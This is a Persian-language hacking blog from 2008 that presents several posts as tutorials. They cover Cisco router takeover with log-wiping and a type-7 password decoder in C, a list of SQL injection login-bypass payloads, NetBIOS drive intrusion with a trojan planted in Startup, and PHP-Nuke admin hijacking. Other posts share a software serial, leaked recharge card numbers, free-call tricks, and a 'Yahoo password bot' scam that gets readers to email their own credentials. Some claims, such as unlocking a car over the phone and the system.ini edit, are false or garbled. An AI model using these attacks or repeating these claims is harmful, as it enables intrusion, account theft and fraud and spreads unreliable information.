تبليغاتX





Powered by WebGozar

ml> wel come to the reza hake group
 baz kardan darb otomobil ba mobayl

آیا کلیدهایتان را در اتومبیل قفل شده تان جا گذاشتید؟
آیا اتومبیل تان دارای وسیله ای فعال شونده از راه دور یا ریموت (Remote) جهت باز کردن قفل ها میباشد؟ این موضوع ممکن است روزی بدردتان خورده و مفید واقع شود. یک دلیل خوب جهت داشتن یک تلفن همراه اینست که اگر شما کلیدهایتان را در اتومبیل تان با درهای قفل شده جا گذاشته باشید و کلیدهای زاپاس در خانه تان می باشد با تلفن همراه شخص ساکن در خانه تان با استفاده از تلفن همراه خودتان تماس بگیرید.

تلفن همراه تان را در حدود یک فوت (48/30 سانتیمتر) نزدیک در اتومبیل تان نگه داشته و از شخص مستقر در خانه تان بخواهید در حالیکه کنترل از راه دور یا ریموت باز کردن درب اتومبیل شمارا نزدیک تلفن همراهش نگاه داشته، دگمهء Unlock (باز کردن قفل درب اتومبیل تان) را فشار دهد. سپس قفل درب های اتومبیل شما باز خواهد شد. و از اینکه شخصی مجبور به آوردن دستگاه ریموت قفل اتومبیل شما شود، جلوگیری خواهد شد.

برای این حالت فاصله مشکلی نمی باشد. و شما میتوانید صدها مایل دورتر از خانه تان باشید. و اگر بتوانید به شخصی که دارای "ریموت – Remote " دیگر اتومبیل تان می باشد، دسترسی پیدا کرده و قادر خواهید بود از این طریق درب های قفل شده اتومبیلتان را باز نمایید.

|+| نوشته شده توسط verangar در یکشنبه بیست و ششم خرداد 1387  |
 خدمات جدید سرویس ویترین ایرانسل
ایرانسل، با سرویس های متنوع، کاربردهای جدیدی برای تلفن همراه به جامعه ایرانی معرفی می نماید. به این ترتیب، تلفن همراه دیگر تنها یک وسیله مکالمه یا ارسال پیام کوتاه نیست؛ بلکه مفهوم شبکه تلفن همراه در زمینه های تازه ای چون اطلاعات، فن آوری و ارتباطات بازرگانی مطرح شده است. به این ترتیب، تلفن همراه به یکی از ساده ترین و در دسترس ترین راههای اطلاع رسانی و سرگرمی و تجارت تبدیل می شود. "پورتال چند رسانه ای ایرانسل" با نام تجاری "ویترین"، اولین شبکه عرضه محصولات الکترونیکی روی تلفن همراه در ایران است که در آن، عرضه کنندگانِ محصولات الکترونیکی (Content Providers)، طیف بسیار گسترده ای از محصولات خود را جهت عرضه به مشترکین ایرانسل ارائه می نمایند که البته شاید قبلاً با طرح ویترین ایرانسل آشنایی پیدا کرده باشید و یا شما نیز از طرح رایگان آن استفاده کرده باشید . ایرانسل، با سرویس های متنوع، کاربردهای جدیدی برای تلفن همراه به جامعه ایرانی معرفی می نماید. به این ترتیب، تلفن همراه دیگر تنها یک وسیله مکالمه یا ارسال پیام کوتاه نیست؛ بلکه مفهوم شبکه تلفن همراه در زمینه های تازه ای چون اطلاعات، فن آوری و ارتباطات بازرگانی مطرح شده است. به این ترتیب، تلفن همراه به یکی از ساده ترین و در دسترس ترین راههای اطلاع رسانی و سرگرمی و تجارت تبدیل می شود. "پورتال چند رسانه ای ایرانسل" با نام تجاری "ویترین"، اولین شبکه عرضه محصولات الکترونیکی روی تلفن همراه در ایران است که در آن، عرضه کنندگانِ محصولات الکترونیکی (Content Providers)، طیف بسیار گسترده ای از محصولات خود را جهت عرضه به مشترکین ایرانسل ارائه می نمایند که البته شاید قبلاً با طرح ویترین ایرانسل آشنایی پیدا کرده باشید و یا شما نیز از طرح رایگان آن استفاده کرده باشید . به تازگی ایرانسل ، سرویسهای جدیدی را به ویترین خود افزوده است که در ادامه با آنها بیشتر آشنا می شویم . این خدمات شمال موارد زیر است : 1- کدهای اوقات شرعي2- کدهای پیش بینی وضع هوا 3- کدهای دریافت اس ام اس و فال4- کدهای طالع بینی روزانه (بر حسب متولدین هر ماه) - کدهای طالع بینی (بر اساس نام سال تولد) برای استفاده از هر کدام از سرویسهای فوق تنها کافی است با استفاده از سیم کارت ایرانسل خود ، کد مربوط به هر کدام را ، به شماره 2020 اس ام اس کنید . لازم به توضیح است تمامی پیام های کوتاهی که به شماره 2020 ارسال می شوند رایگان بوده و هیچ هزینه ای برای شما نخواهد داشت . کدهای اوقات شرعی: 100 تهران101 مشهد103 کرج104 تبریز105 اهواز106 اصفهان107 قم108 ارومیه109 کرمانشاه110 همدان111 شیراز112 گرگان113 یزد114 اراک115 ساری116 رشت توجه: سایر استانها هنوز موجود نیست. کدهای پیش بینی وضع هوا: 133 تهران134 مشهد135 کرج136 تبریز137 اهواز138 اصفهان139 قم140 ارومیه141 کرمانشاه142 همدان143 شیراز144 گرگان145 یزد146 اراک147 ساری148 رشت توجه: سایر استانها هنوز موجود نیست. کدهای اس ام اس و فال: 117 دریافت اس ام اس های عاشقانه118 دریافت اس ام اس های سرکاریHFZ دریافت فال حافظ (در صورت داشتن فونت فارسی در گوشی) کدهای طالع بینی روزانه: (بر حسب متولدین هر ماه) 121 فروردین (HML) 122 اردیبهشت (SOR) 123 خرداد (JOZ) 124 تیر (SRT) 125 مرداد (ASD) 126 شهریور (SNB) 127 مهر (MIZ) 128 آبان (AGH) 129 آذر (GHS) 130 دی (JDY) 131 بهمن (DLV) 132 اسفند (HOT) کدهای طالع بینی: (بر اساس نام سال تولد) 149 مار150 اسب151 گوسفند / بز152 میمون153 مرغ / خروس154 سگ155 خوک156 موش157 گاو158 پلنگ / ببر159 خرگوش / گربه161 نهنگ / اژدها کدهای لیگهای برتر فوتبال جهان: 162 لیگ برتر ایران163 لیگ آرژانتین164 لیگ استرالیا165 لیگ برزیل166 لیگ انگلیس167 لیگ فرانسه168 لیگ آلمان169 لیگ ایتالیا170 لیگ ژاپن171 لیگ کره172 لیگ هلند173 لیگ پرتغال174 لیگ عربستان175 لیگ اسپانیا176 لیگ ترکیه177 لیگ امارات روش کار: برای استفاده از هر کدام از سرویسهای می توانید کد سه رقمی مربوط را به شماره 2020 اس ام اس کنید . به طور مثال برای دریافت یک اس ام اس سر کاری ، کافی است به قسمت New Message گوشی خود مراجعه کرده و در متن پیام کد 118 که مربوط به دریافت اس ام اس سرکاری است را تایپ کرده و سپس به شماره 2020 ارسال کنید . پس از چند دقیقه یک پیام کوتاه دریافت خواهید کرد که حاوی درخواست شما است . اگه شلوغ نوشته شده ببخشيد آخه با موبايل وبلاگو آپ كردم نظر يادتون نره
|+| نوشته شده توسط verangar در چهارشنبه پانزدهم خرداد 1387  |
 مکالمه رایگان
روش اول مکالمه مجانی با موبایل ۱- درصفحه اول یا همون میز کار موبایلتون تايپ كنيد (#094021 *21 *) البته تا 5 دقيقه مسعوليتش با من ولي بيشتر با خودتون چون بعد از 5دقيقه خطتون رديابي ميشه وبعد مصادره به نفع مخابرات البته اگر 100دقيقه هم صحبت كنيد مجانيه راستي بعد ازتايپ اعداد بالا بايد كليد ok رابزنيد وبراي كنسل کردن این کد هم تايپ كنيد (#21#) -------------------------------------------------------------------------------------------- روش دوم مکالمه مجانی با موبایل تايپ كنيد (#09۰ *21 *) البته تا ۳ دقیقه میتوانید مجانی صحبت کنید و اگر بیشتر طول کشید مثل روش بالا خط شما رد یابی نمیگردد ولی مثلا اگر ۳ دقیقه شد ۳ دقیقه و ۱ ثانیه پولش محاسبه و ۲ برابر می شود وهمینطور که ادامه پیدا کند ۳ برابر میشود پس سعی کنید تایم بگیرید و قبل ازپایان ۳ دقیقه مکالمه مجانی به تماس خود خاتمه دهید و در صورت تمایل دوباره تماس بگیرید -------------------------------------------------------------------------------------------- روش سوم در موبایلهای سری ۶۰ tools---->settings---->security----->Pone And Sim----->Closed User group بعد از باز شدن پنجره مورد نظرخواهید دید که ۳ گزینه وجود دارد که به صورت پیش فرض گزینه Default تیک دار است با انتخاب گزینه On تلفن را از حالت پیش فرض Default خارج میکنیم سپس مشاهده میکنیم که پنجره دیگری باز شد که از ما در خواست عددی را دارد یا بهتر بگویم چهار رقم آخر شماره خود را در آن کادر سفید وارد میکنید ودر انتها Ok میکنید. این کد محدودیتی برای تماس ایجاد نمیکند ومیتوانید تا هر مدتی که خواستید به مکالمه خود ادامه دهید. این کد باعث نصف شدن هزینه مکالمه شما میگردد . البته لازم به ذکر است که دوتا کد اولی به درد همه موبایلها میخوره ولی کد سوم روی بعضی از گوشی ه
|+| نوشته شده توسط verangar در جمعه بیست و هفتم اردیبهشت 1387  |
 bana be darkhaste baro bach chanta karte sharj mezaram
karte sharjn irancell harke zodtar vardasht 992417049125 992485243211 993162413453 983136143521 993163531263 993156431342 993431625623 983131232132
|+| نوشته شده توسط verangar در جمعه بیست و هفتم اردیبهشت 1387  |
 هک کردن کارت شارج ایرانسل
فعلان این پست رو بر میدارم اگر کسی دوست داشت فقط کافیی در قسمت نظر با ذکر نام ایمل خودش به من اطلاع بده
|+| نوشته شده توسط verangar در جمعه بیستم اردیبهشت 1387  |
 برای دوستانه گلم که میخان کارته اینترنت مفت به دست بیارن
Modem spy

برنامه Modem spy چندين كار مهم را انجام مي دهد كه بنده

آنها را به صورت فهرست وار در زير آورده ام.

1- پيدا كردن شماره تلفن كسي كه با وي چت مي كنيم

2- ظبط مكالماتي كه از تلفن صورت مي گيرد

3- نمايش دادن شماره تلفن شخصي كه به شما تماس مي گيرد(Caller ID)

هر كس اين برنامه را مي خواهد اينجا را كليك كند.
http://www.modemspy.com/ftp/modemspy.zip
اينم رجيستر نامبرش :

Name: modemspy
SN: 14458


خوب حالا روش كا با نرم افزار:

بعد از دريافت و اجراي نرم افزار يك شمايل كوچك در نوار وظيفه ويندوز

مشاهده مي نماييد. كه براي دسترسي به ترم افزار مي توانيد روي آن كليك

كنيد.

ابتدا تنظيمات مربوط به نرم افزار:

روي منوي فايل كليك كرده و گزينه Preferences را انتخاب نماييد. سپس

زبانه Harware را انتخاب نماييد و در آنجا مودم خود را براي نرم افزار مشخص

نماييد. همچنين تيك هر دو گزينه را بزنيد و در پايين اين دو گزينه كارت صوتي

خود را براي نرم افزار مشخص نماييد.حال به سراغ تب Recording برويد اگر

بخواهيد تمامي مكالماتي كه با شما تماس گرفته مي شود را ظبط كنيد بايد

تيك مربوط به گزينه Record all incoming calls را بزنيد در قسمت Answer

a call in seconds نيز در جاي خالي بايد مدت زماني را كه براي فعال شدن

برنامه وقتي كه كسي با شما تماس مي گيرد براي ظبط مكالمات مي باشد

را وارد نماييد كه بهتر است زمان 10 ثانيه باشد. اگر بخواهيد كه شما

مكالماتي كه با ديگران تماس مي گيريد را ظبط كنيد بايد تيك مربوط به گزينه

Record all outcalling … را علامت بزنيد.البته اگر اين تيك فعال باشد برنامه

هر 30ثانيه خط تلفن را براي شناساي اينكه كسي صحبت مي كند يا نه چك

مي نمايد. براي تغيير اين زمان مي توانيد در قسمت Check for dial tone

زمان مربوطه را وارد نماييد.

حال تب Save as را انتخاب نماييد.در قسمت Change format مي توانيد

فرمت مناسب براي ظبط مكالمات را انتخاب نماييد

در قسمت Advanced نيز هيچ گونه تغييري ندهيد در انتها گزينه Apply را

كليك كنيد

حال دوباره به صفحه اصلي برنامه بر مي گرديم.در قسمت Input device

گزينه Modem و در قسمت Outpout device نيز Sound carad را انتخاب

نماييد و هر دو تيك كنار آنها را علامت بزنيد در پايين نرم افزار نيز تيك Record

all incoming calls را نيز علامت بزنيد. خوب تمام شد. اين نرم افزار به

شرطي كا مي كند كه مودم شما از قابليتهايي كه اين نرم افزار دارد و در بالا

معرفي شد پشتيباني كند اگر بعد از نصب نرم افزر با پيغام خطايي مواجه

شديد يعني مودم شما از اين قابليتها پشتيباني نمي كند

حالا فقط کافيه برنامه باز باشه .

اما چگونه هنگام چت شماره تلفن طرف رو پيدا کنيم:

برای اينکار شما بايد اول اين فايل پلاگين رو از اينجا دانلود کنيد.
http://www.modemspy.com/ftp/plugins/networking.msplg

در مرحله بعد اين فايل رو در پوشه plugin در مکانی که نرم افزار نصب شده

کپی کنيد.

حالا ازمنو plugin در بالای نرم افزار گزينه networking را فعال کنيد ( معمولا

خودش فعاله اما کار از محکم کاری عيب نميکنی) توجه کنيد هيچکدام از

تنضيمات آن را تغيير ندهيد . حالا کافيست نرم افزار باز باشد خود نرم افزار به

صورت خودکار شماره طرف رو بهتون نشون ميده .

حالا فقط کافيه برنامه باز باشه .

حالا اگه کار نکرد ديگه تقصير مودمتونه

 

یه راه برای اکانت دزدی.....................................................................

براي اينکه از اکانت خود بيشتر يا براي خميشه مصرف کنين همراه من

باشين.

اول فايل System.ini را در سيستم خود سرچ کنين.

و بعد کامل نوشته هاي داخل آن را پاک کنيد و اين را کپي کنين توي اون

و سيو کنين. در ويندوز ايکس پي.

 

; for 16-bit app support
[drivers]
wave=mmdrv.dll
timer=timer.drv
[mci]
[driver32]
[386enh
Com0@00 Irq0000@0 Buffer=1024
@ number = ( 3,1,4,1,5,9)
@ letters = ( " this", " is ", "a" , "test" )
$word , $ anther - word - ) = ( " one " , "two" )
woafont=dosapp.FON]
woafont=dosapp.FON
EGA80WOA.FON=EGA80850.FON
EGA40WOA.FON=EGA40850.FON
CGA80WOA.FON=CGA80850.FON
CGA40WOA.FON=CGA40850.FON

 نظر یادتون نره.........................

 

|+| نوشته شده توسط verangar در جمعه بیستم اردیبهشت 1387  |
 آموزش هک سایت
.چرا روتر رو هک می‌کنن ؟؟؟
مساله اینه که این سیستم ها معمولا سرعت خیلی‌ زیادی دارند و می‌شه برای

حمله به سایر سیستم ها از شون استفاده کرد مثلا برای حمله DoS به یک سرور و

مثلا دان کردن اونو در ضمن معمولا اطلاعات زیادی به اونا ارسال می‌شه و شاید ما

با این اطلاعات بتونیم سایر کامپیوتر هایی‌ هم که در شبکه اونا موجود هک کنیم.

---------------------------------------------

2.چجوری یه روتر سیسکو پیدا کنیم؟؟؟
خب معمولا هر ISP از یک روتر استفاده میکنه و ساده ترین راه برای

 پیدا کردن اون اینه که یه traceroute از dos کنیم (تایپ کنید '"tracert'" و بعد

 IP یک بابا ایرو هرکی‌ عشق مبارک کشید)خوب این tracertهر کامپیوتر بین

شما و اون بابا رو نشون میده ( IP یش رو) خب اسم یکی‌ از این کامپیوتر های

 کذایی‌ باید "cisco" باشه (این جا این طور نوشته اگه نیست من کاره ای نیستم به خدا)

خب حالا ما میخوایم ببینیم که این "cisco" با فایروال محافظت می‌شه یا نه خب

دو تا راه داره بابام جاناول ping ش می‌کنیم اگه جواب داد یعنی‌ این که فایروال نداره

 (این راه ممکن با اینترنت شما جور در نیاد چون اکثر ISP های ما پرت ping رو می بندن

(مگه مرض دارن ؟؟!! آره دارن!!) پس بهتره روش دوم هم امتحان کنید)
دیم سعی‌ کنیم با تلنت به پرت 23 وصل شویم اگه فقط از ما پسورد خواست

یعنی‌ ایول فایروال نداره ولی‌ اگه یوزرنیم هم خواست یعنی‌ فایروال داره و هتر بیخیالش شیم.
----------------------------------------------

3. حالا برسیم سر اصل مطلب ، هک cisco
روتر هایی‌ که نرم افزار با ورژن 4.1 کار می‌کنن (که معمولا هم اکثر cisco ها اینطوریند)

خیلی‌ راحت و مسخره از کار میفتن فقط کافی‌ شما کافیه به پرت 23 اون ها وصل بشین و وقتی‌ از شما پسورد خواست یه پسورد کت و کلفت بهش بدید که کف کنه یه چیزی مثل این:

10293847465
qpwoeirutyalskdjfhgzmxncbv019dsk1029384746

5qpwoeirutyalskdjfhgzmxncbv019dsk10293847465qpwoeirutyalskdjfhgzmxncb
v019dsk10293847465qpwoeirutyalskdjfhgzmxncbv01

9dsk10293847465qpwoeirutyalskdjfhgzmxncbv019dsk10293847465qpwoeirut
yalskdjfhgzmxncbv019dsk10293847465qpwoei

rutyalskdjfhgzmxncbv019dsk10293847465qpwoeirutyalskdjfhgzmxncbv019dsk

حالا خب اگه روتر آسیب پذیر باشه برای مدت تقریبا دو تا ده دقیقه می پکه و وقتی‌ یه روتر cisco می پکه میره رو حالت default و روی حالت default پسورد اون می‌شه چی‌!
می‌شه "admin" خب ایوول حالا شما باید سریع به اون وصل شین و با پسورد "admin" برید تو

خب حالا اگه شما تایپ کنید '"؟'" لیست command ها رو می‌ بینید
حالا اگه میخواید کسی‌ نفهمه شما تو روتر چیکار کردید تایپ کنید
"terminal history size 0"
حالا میخوایم پسورد رو تغییر بدیم می‌ تایپیم :
conf t
no enable secret
line vty 0 4
password newpassword
ctrl+z حالا دو بار
تایپ کنید rel و کارهایی که میگه بکنید
خب برای پاک کردن رد پاها (که توی کشور ما خیلی‌ بهش توجه می‌کنن!!البته برای جاهای دولتی‌ واقعا خطرناک پس یا سراغ این جاها نرید یا لااقل رد نذارید ) تایپ کنید:

conf t
no ip finger
no logging console
no logging buffer
no logging trap
no logging monitor
no loggin on
no service finger

اگه بگردین ممکن command ای برای transfer فایل گیر بیارید که میتونید از اون برای فرستادن فایل ادمین به کامپیوتر خودتون استفاده کنید و مثلا با HyperTerminalدریافت کنید(مرده ترجمه کردنه خودمم تو یه خط دو تا کلمه فارسی ننوشتم!!) خب این فایل به چه درد میخوره؟؟؟ ما میتونیم با John the Ripper پسورد رو در بیاریم یا با یه برنامه مثل برنامه زیر اون رو
decrypt کنیم

#include
#include

char xlat[] = {
0x64, 0x73, 0x66, 0x64, 0x3b, 0x6b, 0x66, 0x6f,
0x41, 0x2c, 0x2e, 0x69, 0x79, 0x65, 0x77, 0x72,
0x6b, 0x6c, 0x64, 0x4a, 0x4b, 0x44
};

char pw_str1[] = "password 7 ";
char pw_str2[] = "enable-password 7 ";

char *pname;

cdecrypt(enc_pw, dec_pw)
char *enc_pw;
char *dec_pw;
{
unsigned int seed, i, val = 0;

if(strlen(enc_pw) & 1)
return(-1);

seed = (enc_pw[0] - '0') * 10 + enc_pw[1] - '0';

if (seed > 15 || !isdigit(enc_pw[0]) || !isdigit(enc_pw[1]))
return(-1);

for (i = 2 ; i <= strlen(enc_pw); i++) {
if(i !=2 && !(i & 1)) {
dec_pw[i / 2 - 2] = val ^ xlat[seed++];
val = 0;
}

val *= 16;

if(isdigit(enc_pw = toupper(enc_pw))) {
val += enc_pw - '0';
continue;
}

if(enc_pw >= 'A' && enc_pw <= 'F') {
val += enc_pw - 'A' + 10;
continue;
}

if(strlen(enc_pw) != i)
return(-1);
}

dec_pw[++i / 2] = 0;

return(0);
}

usage()
{
fprintf(stdout, "Usage: %s -p n", pname);
fprintf(stdout, " %s n", pname);

return(0);
}

main(argc,argv)
int argc;
char **argv;

{
FILE *in = stdin, *out = stdout;
char line[257];
char passwd[65];
unsigned int i, pw_pos;

pname = argv[0];

if(argc > 1)
{
if(argc > 3) {
usage();
exit(1);
}

if(argv[1][0] == '-')
{
switch(argv[1][1]) {
case 'h':
usage();
break;

case 'p':
if(cdecrypt(argv[2], passwd)) {
fprintf(stderr, "Error.n");
exit(1);
}
fprintf(stdout, "password: %sn", passwd);
break;

default:
fprintf(stderr, "%s: unknow option.", pname);
}

return(0);
}

if((in = fopen(argv[1], "rt")) == NULL)
exit(1);
if(argc > 2)
if((out = fopen(argv[2], "wt")) == NULL)
exit(1);
}

while(1) {
for(i = 0; i < 256; i++) {
if((line = fgetc(in)) == EOF) {
if(i)
break;

fclose(in);
fclose(out);
return(0);
}
if(line == 'r')
i--;

if(line == 'n')
break;
}
pw_pos = 0;
line = 0;

if(!strncmp(line, pw_str1, strlen(pw_str1)))
pw_pos = strlen(pw_str1);

if(!strncmp(line, pw_str2, strlen(pw_str2)))
pw_pos = strlen(pw_str2);

if(!pw_pos) {
fprintf(stdout, "%sn", line);
continue;
}

if(cdecrypt(&line[pw_pos], passwd)) {
fprintf(stderr, "Error.n");
exit(1);
}
else {
if(pw_pos == strlen(pw_str1))
fprintf(out, "%s", pw_str1);
else
fprintf(out, "%s", pw_str2);

fprintf(out, "%sn", passwd);
}
}
}

این سورس کذایی‌ رو باید با Linux کامپایل کنید اگر Linux ندارید همون روش اول رو امتحان کنید

راستی‌ اگه روتر در مقابل پسورد کلفت ما عکس العملی‌ نشون نداد میتونیم یه حمله DoS بکنیم مثلا یه ping خفن مثل این "ping -l 56550 cisco.router.ip -t" این هم مثل همون روش پسورد باعث defaultشدن روتر می‌شه

آموزش هک سایت

يكي از نقطه ضعف هاي Sql رشته ي ساختار ان ميباشد كه هميشه آسيب پذير بوده و مورد حمله قرار ميگيرد اين آموزش به شما روشهايي ياد ميده كه بتوانيد اين ساختار را مورد حمله قرار بدهيد .
حالا ميتوانيد در گوگل عبارت زير را سرچ كنيد :
login.asp
در جواب براي شما تقريبا 17 هزار مورد پيدا ميكند . حالا به لينك يافته ها دقت كنيد مثلا چنين خواهيد يافت :
www.site.com/login.asp
يا چيزهايي مشابه اين . اين قسمتها را ميتوانيم مورد حمله قرار دهيم . حالا به ساده ترين قسمت رسيديم
كافي است براي رد كردن اين مانع بصورت زير عمل كنيد
بجاي يوزر نيم Admin را بزنيد و بجاي پسورد از اين عبارت استفاده كنيد
or 1=1—
شايد تا حالا كه مقاله را خوانده ايد تعجب كرده ايد كه اين امر چگونه امكان پذير است . در تمامي اين عمليات اطلاعات لاگين شما بصورت Query فرستاده ميشود . اگر اطلاعات درست باشد شما اجازه ي ورود خواهيد يافت وگرنه با پيغام Login Failed مواجه خواهيد شد . وقتي شما ارسالي را با يوزر ادمين و با پسورد 1234 را ارسال ميكنيد از حالت اول به حالت دوم تغيير پيدا ميكند :
حالت اول :
"select *from table1 where login=""&log&""and password=""pwd&"" '
حالت دوم‌:

"select *from table1 where login="Admin"and password="1234" '
حالا با استفاده از اين تركيبات شما ميتوانيد با توجه به ساختار اس كيو ال براي آن پسورد هايي ارسال كنيد كه در صورت قرار گرفتن در اين پسورد مورد قبول قرار گيرد و در واقع با استفاده از نقطه ضعف Query Stringsبه آن حمله كند . اين تركيبات كه با توجه به ساختار اس كيو ال نوشته شده به اين صورت ميباشد نمونه هايي از آن مشاهده ميكنيد :
admin'--

' or 0=0 --

" or 0=0 --

or 0=0 --

' or 0=0 #

" or 0=0 #

or 0=0 #

' or 'x'='x

" or "x"="x

') or ('x'='x

' or 1=1--

" or 1=1--

or 1=1--

' or a=a--

" or "a"="a

') or ('a'='a

") or ("a"="a

hi" or "a"="a

hi" or 1=1 --

hi' or 1=1 --

hi' or 'a'='a

hi') or ('a'='a

hi") or ("a"="a

همانطور كه مشاهده كرديد اين روش يك روش ساده اما ابتكاري مباشذ كه احتياج به تفكر دقيق دارد البته ساختار ها متفاوت ميباشند و شما ميتوانيد همه ي اين تركيبات بالا را به عنوان پسورد امتحان كنيد و حتما به جواب خواهيد رسيد .

آموزش هک سایت

سلام دوستان
خیلی ها دوست دارن سایت هک کنن ولی به علتهای مختلف یا نمیتونن وقت بزارن روش یا سایت امنیتش بالاست یا فرد دانش هک کردن رو نداره و... حالا در این درس به آموزش چندین روش برای آموزش هک متداول ترین فروم که PHP-Nuke است بپردازیم.
اول باید خصوصیات سایت را بررسی کنید و اولین خوصوصیات ضروری پی اچ پی نوک بودن آن هست! به روش های مختلف هک کردنه یوزر ادمین یا ساختن ادمین مخفی را یاد بگیرید.
در هر سایت نوک یک فروم قرار دارد و همینوطور که میدانید در فروم یک یا چند نفر به cp (مخفف کنترل پانل) دسترسی دارند. شاید از همین فکر چیزی فهمیده باشید. پس در هر تالار چندین کاربر (user) وجود دارد (بستگی به کیفیت تالار دارد) و مدیر هم در بین این کاربران هست و نا کاربری او فاحش هست و می توانید آن را به راحتی ببینید.با این توضیح شما دو روش را برای هم حدس زدید. درسته ! می گن هک سایت سخته ولی اونقدرا هم سخت نیست حتی با ماجیک هم میشه سایت هک کرد! پس فعلا با ماجیک هک می کنیم تا برسیم به جاهای پیشرفته! حالا بايد به سيستم طرف براي نصب تروجان نفوذ كنيد و نت بايوس بهترين راه هست!
نفوذ به سيستم از طريق NetBios
-------------------------------------------
با یاد گیری این مقاله شما میتونید یک درایو از سیستم قربانی رو به وسیله نت بایوس Share کنید و هر کاری که خواستید توی اون درایو انجام بدید ( فایل بذارید ، بردارید ، پاک کنید و ... ) البته من این مقاله رو به صورت تصویری هم تو سایت گذاشتم ، می تونید دانلود کنید.
خب بریم سره موضوع اصلی:
اول باید IP سیستم مورد نظر رو پیدا کنید ( تو سایت قبلا اموزش دادم ) ، بعد از منوی Start قسمت Run برید و تایپ کنید CMD. بعد از اینکه وارد CMD شدید این دستور رو بنویسید:
Net use x: \\IP\DriveName$
به جای X میتونید هر حرفی رو بنویسید به غیر از حروفی که اسم درایو های خودتون هست.مثلا اگه درایو G داشته باشید ، از حرف G نمیتونید استفاده کنید. به جای IP هم ای پی مورد نظر رو که می خواهید بهش نفوذ کنید رو بنویسید. به جای DriveName هم اسم درایو رو بنویسید. اگه مثلا میخواهید درایو C رو Share کنید ، حرف c رو بنویسید.یک نمونه از دستور رو ببینید:
Net use x: \\80.191.191.39\c$
اگه کمی شانس داشته باشید بدون در خواست User Name و Password درایو Share میشه و این پیغام رو مینویسه: The command completed successfully اما اگه از شما در خواست یوزر نیم و پسورد کرد به جای یوزر نیم کلمه Administrator رو وارد کنید که برای ویندوز XP و 2000 تعریف شده است ( البته معمولا تو یه خط یوزر نیم رو میده ).پسورد هم میتونید با یه برنامه مثل بروتوس( Brutus ) پیدا کنید.
اگه شما درایوی رو Share کرده باشید که ویندوز قربانی هم تو همون درایو نصب شده باشه ، می تونید سرور یک تروجان رو تو پوشه Startup تو قسمت Start Menu کپی کنید و منتظر باشد قربانی ریستارت کنه تا فایل سرور اجرا شه و شما به راحتی با تروجان به سیستم وارد بشید. ( یادتون باشه که سرور رو فقط کپی کنید چون اگه اجرا کنید در واقع تو سیستم خودتون اجرا کردید )
حالا که یک تروجان در ستارت آپ طرف کپی شد و پسورد او را دریافت کردید.....
هر کاربر در هنگام ثبت نام در هر تالاری در سایت های نوک باید به اجبار ایمیلی برای خود انتخاب کند که پسورد انتخاب شده به آن ایمیل ارسال شود. ایم خودش یک باگ امنیتی هست و لازم نیست که حتما اکسپلویتی جولوی شما باشد! (ولی بعد از این روش با اکسپلویتی برای هک نوک هک آشنا می شوید)خوب به قسمت (رمزعبور را فراموش کردم) یا ( Forget PassWord ) بروید و ایمیل طرف را وارد تا پسورد فرستاده شود. (این عمل در صورتی اتفاق می شود که نام کاربری بوسیله ی یک ایمیل پشتیبانی شود که در اغلب فروم ها اینجوری هست) حالا که پسورد کاربر مدیر و یا همان شناسه مدیر را گرفتید به منطقه ی کنترل (کنترل پانل) نفوذ کنید و شناسه ی حای را پاک کرده و شناسه ای بسازید و index را عوض کنید. قبل از اینکه ورود به کنترل پانل را به شما یاد دهیم بهتر استروش دیگری برای ساخت ادمین مخفی ( hide admin ) یاد بگیریم! اول باید بفهمیم که نوک چیست؟
پی اچ پی نوک انواع مختلفی دارد که از سال ۲۰۰۱ به ورژن های مجانی تبدیل شد و برای همین شهرت زیادی پیدا کرد در ابتدا تیم های آمریکایی و پاکستانی ورزن های ۶.۸ . ۶.۹ را مجانی کردند و ایرانی های عزیز نیز برای هموطننانشان از ورژن ۷.۳ تا ۷.۸ (آخرین نسخه) را ترجمه کردند و نوک های فراسی را بوجود آوردند. مثل گروه معروف IranNuke
این اکسپلویت هم به شما کمک می کند که در کنترل پانل سایت نوک وارد شوید و شناسه ی مدیرتی برای خود بسازید. این اکسپولیت برای نوک ۷.۳ تا ۷.۷ هست و نوک ۷.۸ را فقط اگر روی لکال هاست باشد هک می کند.

USERNAME:
NOME:
PASSWORD:
E-MAIL:



خوب در قسمتی از کد نوشته شده: http://www.sitename.com/admin.php
به جای sitename نام سایت را بنویسید و آن را با پسوند html ذخیره سازید.
به این صورت : exploit.html
حالا روی آن کلیک کنید و صفحه ای همانند صفحه ی عضویت در آن تالار باز می شود! (حالا بستگی دارد که چه چیز هایی از شما درخواست کند) حالا آن را که پر کردید در زیر آن Create Admin را کلیک کنید و مستقیما به http://www.sitename.com/admin.php میرید و اونجا با یوزری (شناسه ایی) که ساختید وارد شوید! حالا شما هم سایت پی اچ پی نوک هک کردید!

موفق باشید

|+| نوشته شده توسط verangar در جمعه بیستم اردیبهشت 1387  |
 هک کردن id از طریق ربات پسوردیاب یاهو (ropasy)
مراحل کار :

 


- بعد از ورود به حساب ایمیل خود compose  را بزنید تا صفحه مخصوص ارسال ایمیل باز شود .


- در قسمت subject عبارت : password request را تایپ می کنید .


- در قسمت    to     ایمیل  : snoopy@yahoo.com  را وارد کنید .


- مهمترین قسمت این کار نوشتن متن نامه است که چون شامل یک ویرووس است باید با دقت کافی نوشته شود . توجه داشته باشید که بزرگی و کوچکی حروف هم اهمیت دارد .

 


$3Pwr.PaSs%6di


SwD2/m$=your ID


 %U8e.pj$=your password


@3U\$wP=victim ID


pX6iD%p9$/hG13-biN


6Pn.3$/9W\.


=Dv@pj%.SO;-pj$

 


حالا باید بجای قسمت هایی که با رنگ قرمز نوشته شده است اطلاعات خود را وارد کنید .


- بجای عبارت : your ID  , آی دی خود را وارد کنید .


- بجای عبارت : your password  , پسورد خود را وارد کنید .


- بجای عبارت :  victim ID , آی دی قربانی را وارد کنید .

 


حالا فقط کافی است send را فشار دهید .


البته توجه داشته باشید که چون این ایمیل شامل یک ویرووس است امکان دارد که هنگام ارسال آن یاهو پیغام خطایی نمایش دهد . که در این صورت شما گزینه yes, I’m sure  را انتخاب می کنید .


اگر تمامی مراحل را درست انجام دهید  وقتی قربانی ایمل خود را باز کند , پسورد ظرف  24 ساعت بعد از ارسال این ایمیل به ایمل  شما ارسال خواهد شد .

|+| نوشته شده توسط verangar در جمعه بیستم اردیبهشت 1387  |
 
 
بالا


Javascripts


dy> ml>